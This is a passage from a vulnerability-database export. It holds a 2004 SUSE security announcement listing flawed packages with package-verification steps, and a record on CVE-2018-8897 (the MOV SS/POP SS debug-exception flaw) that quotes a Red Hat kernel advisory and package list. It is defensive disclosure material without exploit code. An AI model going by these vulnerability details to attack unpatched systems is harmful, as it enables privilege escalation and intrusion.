vulnerabilities in SUSE Distributions and Workarounds:\n\n    - icecast\n    The icecast service is vulnerable to a remote denial-of-service\n    attack. Update packages will be available soon. \n\n    - sitecopy\n    The sitecopy package includes a vulnerable version of the\n    neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be\n    available soon. \n\n    - cadaver\n    The cadaver package includes a vulnerable version of the\n    neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be\n    available soon. \n\n    - OpenOffice_org\n    The OpenOffice_org package includes a vulnerable version\n    of the neon library (CAN-2004-0179, CAN-2004-0398). Update packages\n    will be available soon. \n\n    - tripwire\n    A format string bug in tripwire can be exploited locally\n    to gain root permissions. \n    New packages are available. \n\n    - postgresql\n    A buffer overflow in psqlODBC could be exploited to crash the\n    application using it. E.g. a PHP script that uses ODBC to access a\n    PostgreSQL database can be utilized to crash the surrounding Apache\n    web-server. Other parts of PostgreSQL are not affected. \n    New packages are available. \n\n    - XDM/XFree86\n    This update resolves random listening to ports by XDM\n    that allows to connect via the XDMCP. SUSE LINUX 9.1\n    is affected only. \n    New packages are available. \n\n    - mod_proxy\n    A buffer overflow can be triggered by malicious remote\n    servers that return a negative Content-Length value. \n    This vulnerability can be used to execute commands remotely\n    New packages are available. \n\n    - freeswan\n    A bug in the certificate chain authentication code could allow an\n    attacker to authenticate any host against a FreeS/WAN server by\n    presenting specially crafted certificates wrapped in a PKCS#7 file. \n    The packages are currently being tested and will be available soon. \n\n    - ipsec-tools\n    The racoon daemon which is responsible for handling IKE messages\n    fails to reject invalid or self-signed X.509 certificates which\n    allows for man-in-the-middle attacks on IPsec tunnels established\n    via racoon. \n    The packages are currently being tested and will be available soon. \n\n    - less\n    This update fixes a possible symlink attack in lessopen.sh. The\n    attack can be executed by local users to overwrite arbitrary files\n    with the privileges of the user running less. \n    New packages are available. \n\n    - libpng\n    This update adds a missing fix for CAN-2002-1363. \n    New packages are available. \n\n    - pavuk\n    This update fixes a remotely exploitable buffer overflow in pavuk. \n    Thanks to Ulf Harnhammar for reporting this to us. \n    New packages are available. \n\n    - kdebase3\n    This update fixes a possible attack on tmp files created at the\n    first login of a user using KDE or at the first time running a\n    KDE application. This bug can be exploited locally to overwrite\n    arbitrary files with the privilege of the victim user. \n    Just affects SUSE LINUX 9.1\n    New packages are available. \n\n______________________________________________________________________________\n\n3)  standard appendix: authenticity verification, additional information\n\n  - Package authenticity verification:\n\n    SUSE update packages are available on many mirror ftp servers around\n    the world. While this service is considered valuable and important\n    to the free and open source software community, many users wish to be\n    certain as to be the origin of the package and its content before\n    installing the package. There are two independent verification methods\n    that can be used to prove the authenticity of a downloaded file or\n    rpm package:\n    1) md5sums as provided in the (cryptographically signed) announcement. \n    2) using the internal gpg signatures of the rpm package. \n\n    1) execute the command\n        md5sum \u003cname-of-the-file.rpm\u003e\n       after you have downloaded the file from a SUSE ftp server or its\n       mirrors. Then, compare the resulting md5sum with the one that is\n       listed in the announcement. Since the announcement containing the\n       checksums is cryptographically signed (usually using the key\n       security@suse.de), the checksums offer proof of the authenticity\n       of the package. \n       We recommend against subscribing to security lists which cause the\n       email message containing the announcement to be modified so that\n       the signature does not match after transport through the mailing\n       list software. \n       Downsides: You must be able to verify the authenticity of the\n       announcement in the first place. If RPM packages are being rebuilt\n       and a new version of a package is published on the ftp server, all\n       md5 sums for the files are useless. \n\n    2) rpm package signatures provide an easy way to verify the authenticity\n       of an rpm package. Use the command\n        rpm -v --checksig \u003cfile.rpm\u003e\n       to verify the signature of the package, where \u003cfile.rpm\u003e is the\n       filename of the rpm package that you have downloaded. Of course,\n       package authenticity verification can only target an un-installed rpm\n       package file. \n       Prerequisites:\n        a) gpg is installed\n        b) The package is signed using a certain key. The public part of this\n           key must be installed by the gpg program in the directory\n           ~/.gnupg/ under the user\u0027s home directory who performs the\n           signature verification (usually root). You can import the key\n           that is used by SUSE in rpm packages for SUSE Linux by saving\n           this announcement to a file (\"announcement.txt\") and\n           running the command (do \"su -\" to be root):\n            gpg --batch; gpg \u003c announcement.txt | gpg --import\n           SUSE Linux distributions version 7.1 and thereafter install the\n           key \"build@suse.de\" upon installation or upgrade, provided that\n           the package gpg is installed. The file containing the public key\n           is placed at the top-level directory of the first CD (pubring.gpg)\n           and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de . \n\n\n  - SUSE runs two security mailing lists to which any interested party may\n    subscribe:\n\n    suse-security@suse.com\n        -   general/linux/SUSE security discussion. \n            All SUSE security announcements are sent to this list. \n            To subscribe, send an email to\n                \u003csuse-security-subscribe@suse.com\u003e. \n\n    suse-security-announce@suse.com\n        -   SUSE\u0027s announce-only mailing list. \n            Only SUSE\u0027s security announcements are sent to this list. \n            To subscribe, send an email to\n                \u003csuse-security-announce-subscribe@suse.com\u003e. \n\n    For general information or the frequently asked questions (faq)\n    send mail to:\n        \u003csuse-security-info@suse.com\u003e or\n        \u003csuse-security-faq@suse.com\u003e respectively. \n\n    =====================================================================\n    SUSE\u0027s security contact is \u003csecurity@suse.com\u003e or \u003csecurity@suse.de\u003e. \n    The \u003csecurity@suse.de\u003e public key is listed below. \n    =====================================================================\n______________________________________________________________________________\n\n    The information in this advisory may be distributed or reproduced,\n    provided that the advisory is not modified in any way. In particular,\n    it is desired that the clear-text signature must show proof of the\n    authenticity of the text. \n    SUSE Linux AG makes no warranties of any kind whatsoever with respect\n    to the information contained in this security advisory. \n\nType Bits/KeyID    Date       User ID\npub  2048R/3D25D3D9 1999-03-06 SuSE Security Team \u003csecurity@suse.de\u003e\npub  1024D/9C800ACA 2000-10-19 SuSE Package Signing Key \u003cbuild@suse.de\u003e\n\n#####-----BEGIN PGP PUBLIC KEY BLOCK-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: For info see http://www.gnupg.org\n\n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\nDgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE=\n=LRKC\n- -----END PGP PUBLIC KEY BLOCK-----\n\n- -- \n -                                                                      -\n| Roman Drahtm\\xfcller      \u003cdraht@suse.de\u003e // \"You don\u0027t need eyes to see, |\n  SUSE Linux AG - Security       Phone: //             you need vision!\"\n| N\\xfcrnberg, Germany     +49-911-740530 //           Maxi Jazz, Faithless |\n -                                                                      -\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\n\niQEVAwUBQOWPL3ey5gA9JdPZAQFFzQf+Mo5WmO40BDHakn4qD5rAcfU6H/0rhMpy\nBi8r+g6GoSp/m2Zy+1O0Qn3jVb/iirVlnHH3DND1r/GunM3c5CTaMYt2Bt7PTOdt\nOsjD41lbiFlHDmmmaodROQvcrz7T67YU0gCtSKJdDfs2ATiiUOcyUQZNfi/PiEqD\njwmKpP5c1NXSXPSwZ2f430itJA5iUqqVBeB1WHn63kOnIKtHBJ9c6uw3rZ99t1OA\niud3L+VQSycb8xQSlOsuiaYW1S236VsogKWRbqY76eo7E2AnVQlMpcZkyW91/vfT\nWntQlZJAaGFX1q/IyGy+PGFPUoJjNc7H6jy5ZqJqXR5Sb0KrHfadCQ==\n=24bz\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0496"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000929"
      },
      {
        "db": "BID",
        "id": "10779"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8926"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      }
    ],
    "trust": 2.07
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2004-0496",
        "trust": 3.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000929",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-022",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "10779",
        "trust": 0.4
      },
      {
        "db": "VULHUB",
        "id": "VHN-8926",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "33705",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8926"
      },
      {
        "db": "BID",
        "id": "10779"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000929"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-022"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0496"
      }
    ]
  },
  "id": "VAR-200412-0084",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8926"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-06-09T19:52:06.030000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Mandrake\u00a0Linux\u00a09.1 SUSESUSE",
        "trust": 0.8,
        "url": "https://www.gentoo.org/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000929"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      },
      {
        "problemtype": "others (CWE-Other) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000929"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0496"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "http://www.novell.com/linux/security/advisories/2004_20_kernel.html"
      },
      {
        "trust": 1.9,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16625"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0496"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0535"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0497"
      },
      {
        "trust": 0.1,
        "url": "http://www.gnupg.org"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0626"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0495"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8926"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000929"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0496"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-8926"
      },
      {
        "db": "BID",
        "id": "10779"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000929"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-022"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0496"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2004-12-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8926"
      },
      {
        "date": "2004-07-22T00:00:00",
        "db": "BID",
        "id": "10779"
      },
      {
        "date": "2024-06-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000929"
      },
      {
        "date": "2004-07-02T12:32:00",
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "date": "2004-07-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200412-022"
      },
      {
        "date": "2004-12-06T05:00:00",
        "db": "NVD",
        "id": "CVE-2004-0496"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-10-30T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8926"
      },
      {
        "date": "2009-07-12T06:16:00",
        "db": "BID",
        "id": "10779"
      },
      {
        "date": "2024-06-07T08:58:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000929"
      },
      {
        "date": "2005-10-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200412-022"
      },
      {
        "date": "2018-10-30T16:26:23.107000",
        "db": "NVD",
        "id": "CVE-2004-0496"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "10779"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-022"
      }
    ],
    "trust": 1.0
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "mandrakesoft\u00a0 of \u00a0mandrake\u00a0multi\u00a0network\u00a0firewall\u00a0 Vulnerabilities in products from multiple vendors such as",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000929"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unknown",
    "sources": [
      {
        "db": "BID",
        "id": "10779"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-022"
      }
    ],
    "trust": 0.9
  }
}

var-201805-0950
Vulnerability from variot

A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A; section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL < 3, the debug exception is delivered after the transfer to CPL < 3 is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs. Some operating systems and hypervisors Intel There is a problem that does not expect a debug exception in the hardware architecture, or does not handle it properly. Inappropriate checking or handling for exceptional situations (CWE-703) - CVE-2018-8897 Intel Software Developer Manual (SDM) Vol. SDM Vol 3A section 2.3 According to the debug exception EFLAGS Register IF flag (Interrupt Enable Flag) Is not prohibited. So in certain situations, certain Intel x86-64 Ring level after using architecture-specific instructions 3 Running on OS From component , Higher ring level ( many OS In the ring level 0) Debug exceptions pointing to the data in are enabled. This allows the attacker to API May be used to access sensitive memory information or manipulate high privileged operating system functions.An authenticated attacker could obtain sensitive data in memory and manipulate higher privileged operating system functions. Microsoft Windows is prone to a local privilege-escalation vulnerability. An attacker can exploit this issue to execute arbitrary code with elevated privileges. Intel Architecture (processor architecture) is a CPU specification developed by Intel Corporation for its processor. There are security vulnerabilities in the operating systems of multiple vendors. Systems from the following vendors are affected: Apple; DragonFly BSD Project; FreeBSD Project; Linux Kernel; Microsoft; Red Hat; SUSE Linux; Ubuntu; Vmware; Xen. 7.2) - noarch, x86_64

  1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2018:1319-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2018:1319 Issue date: 2018-05-08 CVE Names: CVE-2017-7645 CVE-2017-8824 CVE-2017-13166 CVE-2017-18017 CVE-2017-1000410 CVE-2018-8897 =====================================================================

  1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

  • hw: cpu: speculative execution permission faults handling (CVE-2017-5754)

  • Kernel: error in exception handling leads to DoS (CVE-2018-8897)

  • kernel: nfsd: Incorrect handling of long RPC replies (CVE-2017-7645)

  • kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824)

  • kernel: v4l2: disabled memory access protection mechanism allowing privilege escalation (CVE-2017-13166)

  • kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c (CVE-2017-18017)

  • kernel: Stack information leak in the EFS element (CVE-2017-1000410)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.

Red Hat would like to thank Google Project Zero for reporting CVE-2017-5754; Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting CVE-2018-8897; Mohamed Ghannam for reporting CVE-2017-8824; and Armis Labs for reporting CVE-2017-1000410.

Bug Fix(es):

These updated kernel packages include also numerous bug fixes. Space precludes documenting all of these bug fixes in this advisory. See the bug fix descriptions in the related Knowledge Article: https://access.redhat.com/articles/3431591

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1443615 - CVE-2017-7645 kernel: nfsd: Incorrect handling of long RPC replies 1519160 - CVE-2017-1000410 kernel: Stack information leak in the EFS element 1519591 - CVE-2017-8824 kernel: Use-after-free vulnerability in DCCP socket 1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling 1531135 - CVE-2017-18017 kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c 1548412 - CVE-2017-13166 kernel: v4l2: disabled memory access protection mechanism allowing privilege escalation 1567074 - CVE-2018-8897 Kernel: error in exception handling leads to DoS

  1. Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: kernel-2.6.32-696.28.1.el6.src.rpm

i386: kernel-2.6.32-696.28.1.el6.i686.rpm kernel-debug-2.6.32-696.28.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm kernel-devel-2.6.32-696.28.1.el6.i686.rpm kernel-headers-2.6.32-696.28.1.el6.i686.rpm perf-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm kernel-doc-2.6.32-696.28.1.el6.noarch.rpm kernel-firmware-2.6.32-696.28.1.el6.noarch.rpm

x86_64: kernel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm kernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm kernel-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-headers-2.6.32-696.28.1.el6.x86_64.rpm perf-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm

